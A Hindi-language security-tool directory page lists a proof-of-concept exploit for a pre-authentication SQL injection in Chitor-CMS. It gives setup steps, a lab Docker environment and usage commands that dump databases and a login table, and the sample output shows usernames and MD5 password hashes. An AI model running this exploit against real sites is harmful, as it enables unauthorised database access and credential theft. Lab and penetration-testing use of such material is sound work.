Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-31714 — CVE-2023-31714 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Chitor-CMS < 1.1.2 में प्री-ऑथेंटिकेशन SQL इंजेक्शन है। /edit_school.php एंडपॉइंट के माध्यम से डेटाबेस एन्यूमरेशन और क्रेडेंशियल डंपिंग को स्वचालित करता है। | Kitploit
उपकरण/GitHubGitHub/msd0pe-1/cve-2023-31714
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगडेटाबेस सुरक्षा
GitHubmsd0pe-1/cve-2023-31714

CVE-2023-31714

CVE-2023-31714 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Chitor-CMS < 1.1.2 में प्री-ऑथेंटिकेशन SQL इंजेक्शन है। /edit_school.php एंडपॉइंट के माध्यम से डेटाबेस एन्यूमरेशन और क्रेडेंशियल डंपिंग को स्वचालित करता है।

रिपॉजिटरी देखें
185 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-31714 - Chitor-CMS < 1.1.2 प्री-ऑथ SQL इंजेक्शन

msd0pe द्वारा खोजा गया
https://github.com/waqaskanju/Chitor-CMS
प्रोजेक्ट द्वारा waqaskanju

chitor1.1.py (69d3442 कमिट के बाद से पैच किया गया)

2023/04/13
SQL इंजेक्शन /edit_school.php?id= एंडपॉइंट में पाया गया और इसे किसी प्रमाणीकरण की आवश्यकता नहीं है।

chitor1.0.py (5f76192 कमिट के बाद से पोस्ट-ऑथ SQL इंजेक्शन बन गया)

2023/04/09
SQL इंजेक्शन कई एंडपॉइंट्स जैसे /add_school_class.php?school= में पाया गया और इसे किसी प्रमाणीकरण की आवश्यकता नहीं है। 5f76192 कमिट के बाद से, ये एंडपॉइंट सत्यापित करते हैं कि लॉग इन उपयोगकर्ता के पास संपादन अधिकार हैं। यह जाँच पहले से मौजूद थी लेकिन कार्यात्मक नहीं थी।

स्थापना

sudo apt install git virtualenv python3 python3-pip docker-compose
git clone https://github.com/msd0pe-1/cve-2023-31714
virtualenv -p python3 venv
source venv/bin/activate
pip3 install requests prettytable

TO START THE VULNERABLE DOCKER:
  - sudo ./run.sh [1.0|1.1]
TO STOP AND CLEAN THE DOCKER:
  - sudo ./clean.sh

उपयोग

Usage: python chitor1.1.py [options]

Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit
  -u URL, --url=URL     target url
  --dbs                 list databases
  -D DATABASE, --db=DATABASE
                        select a database
  --tables              list tables
  -T TABLE, --table=TABLE
                        select a table
  --dump                dump the content

  Examples:
    python3 chitor1.1.py -u http://127.0.0.1 --dbs
    python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables
    python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump

  Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.
  Source code put in public domain by msd0pe,no Copyright
  Any malicious or illegal activity may be punishable by law
  Use at your own risk

उदाहरण

python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump
+----+-------------+------------+----------------------------------+--------+
| Id | Employee_Id | User_Name  |             Password             | Status |
+----+-------------+------------+----------------------------------+--------+
| 1  |      1      |   Guest    | adb831a7fdd83dd1e2a309ce7591dff8 |   1    |
| 2  |      2      | waqaskanju | ################################ |   1    |
| 3  |      3      |   admin    | 21232f297a57a5a743894a0e4a801fc3 |   1    |
+----+-------------+------------+----------------------------------+--------+
टूल डाउनलोड करें